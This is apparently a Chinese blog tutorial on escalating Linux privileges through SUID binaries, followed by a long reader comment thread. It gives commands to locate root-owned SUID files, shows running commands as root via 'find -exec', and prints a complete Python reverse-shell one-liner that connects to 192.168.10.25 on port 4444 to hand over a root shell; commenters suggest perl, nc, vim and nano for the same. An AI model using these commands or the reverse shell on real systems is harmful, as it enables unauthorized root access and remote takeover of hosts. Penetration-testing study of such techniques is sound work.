AI智能摘要
你还在为渗透测试时卡在普通用户权限而苦恼吗?linux系统中看似普通的find、nmap等命令,竟能成为直通root权限的秘密通道!本文将手把手演示如何利用SUID权限漏洞,通过六个关键步骤从ubuntu用户跃升至系统最高权限。无需复杂工具,仅需几行命令就能让目标主机主动向你敞开root权限的大门,完整重现真实渗透场景中的提权全过程。
— AI 生成的文章内容摘要
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
• nmap • vim • find • bash • more • less • nano • cp
以下命令可以发现系统上运行的所有SUID可执行文件。
1. #以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试 2. find / -perm -u=s -type f 2>/dev/null 3. find / -user root -perm -4000-print2>/dev/null 4. find / -user root -perm -4000-exec ls -ldb {} /;
利用find文件提权
假如我们现在拿到了一个网站服务器的shell,但是权限是ubuntu,我们现在需要提权到 root 用户权限。

我们查看具有root用户权限的SUID文件
find / -perm -u=s -type f 2>/dev/null

我们随便找一个命令进行利用,我们就找find,先查看其信息,发现其确实是root用户权限的SUID的文件

我们先看一下是否能用find命令以root权限运行,发现确实可以以root权限运行
/usr/bin/find examples.desktop -exec whoami /;

至于这里为什么可以用find -exec ,可以查看find帮助或者man手册
然后我们查看目标网站上是否有python环境,可以看到有python2.7.6的环境

于是我们以root用户的身份利用python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #反弹一个sh类型的shell

北京市 1F
这招真香,直接提权成功。
吉林省辽源市 2F
看到SUID就头大,配置错了真是后患无穷。
河南省洛阳市 3F
老手一看就懂,对新手可能有点跳跃。
日本 4F
实战中确实得先看看有哪些SUID文件,不是每个都能用。
湖北省武汉市 5F
直接用find提权,省事又高效。
北京市 B1
@ 奶茶不加糖 确实,比写个C程序编译再执行省事多了。
台湾省 B1
@ 奶茶不加糖 用find -exec确实快,但有些系统会限制这个参数,得先试试。
湖南省常德市 6F
这玩意儿坑太深,玩儿不爽🤔
上海市 7F
思路清晰,值得一试。
浙江省杭州市 8F
find的‑exec到底能传哪些参数,能用来跑更复杂的脚本吗?
四川省 9F
另外,别忘了检查/usr/bin/vim的SUID位,有时也能利用。
上海市长宁区 10F
我之前在一台老服务器上也用find提权,差点被日志记录抓住,真是惊险。
山东省 11F
如果目标机器没有python2,改用perl还能做到同样的反弹吗?
陕西省西安市 B1
@ 影烬灵 perl可以啊,用system或反引号执行shell命令就行,具体要看perl版本。
安徽省合肥市 12F
说所有SUID文件都能直接提权其实有点夸大,很多系统会对‑exec做限制,需要先确认二进制的实际行为。
江苏省常州市 13F
看到有人直接用nano提权,我忍不住笑了,原来编辑器也能当后门,真是意想不到的技巧。
浙江省台州市 14F
find的‑exec真的好用,省掉不少手动写脚本的时间。
台湾省高雄市 B1
@ 橡皮筋跳跃者 对,‑exec参数配合管道或者重定向可以玩出很多花样。
上海市 15F
别忘先用ls -l检查SUID位所有者。
北京市 16F
目标机器没有python2,能直接用perl实现同样的反弹吗?
新加坡 B1
@ 淅沥淅沥 可以,perl也有类似的socket和进程调用功能,语法稍微改改就行。
辽宁省朝阳市 17F
看到有人直接用nano提权,我忍不住笑了,原来编辑器也能当后门。
巴基斯坦 18F
那如果系统禁用了‑exec参数,还能怎么利用?
广东省云浮市 19F
其实SUID文件不少,除了常见的vim、bash,还可以检查一下/usr/bin/awk或perl,有时它们的SUID位也能被滥用,关键是看它们是否允许外部命令执行。
北京市 20F
思路挺清晰。
澳大利亚 21F
SUID这种权限设计真的很容易被钻空子啊,linux的安全性有时候也挺让人担心的。
广东省广州市 22F
之前用nmap提权成功过,不过现在新版本都修复了。
韩国 23F
有没有更简单一点的例子?感觉命令有点复杂,新手看不太明白。
广东省广州市 24F
find这个命令确实好用,我之前也用它来清理过系统垃圾。
日本 25F
要是目标机器装了Docker,用SUID还能不能提权啊?
江苏省淮安市 26F
感觉这个教程写得挺实用的,比那些光讲理论的好多了。
日本 B1
@ 赤焰生 嗯,至少步骤都列出来了,照着做就行。
北京市 27F
这种提权方法对CentOS系统也适用吗?
湖南省株洲市 28F
哈哈,这个技巧收藏了,下次渗透测试的时候试试看。
韩国 29F
用more和less也能提权?这个倒是第一次听说,长见识了。
山东省 30F
这个思路不错,不过实际环境里很多SUID位都被去掉了,得看运气。
贵州省贵阳市 31F
反弹shell那段代码记下了,实战能用上。
上海市 B1
@ ViperFrost 多记几个,find也常用
贵州省贵阳市 32F
之前用bash的SUID提权过,不过现在很多发行版默认都不给了。
上海市金山区 33F
这方法在CentOS 7上试过,可以的。
中国 34F
要是有node环境是不是也能用类似思路?
印度尼西亚 35F
find -exec能传复杂命令吗?比如管道或者重定向?
韩国 36F
这个反弹shell的python代码在3.x上得改改吧?
河南省鹤壁市 37F
直接用nc弹shell是不是也行?
广西 38F
vim也能这么玩吗?好奇
浙江省 B1
@ 钢铁侠不洗澡 vim可以,但得看系统配置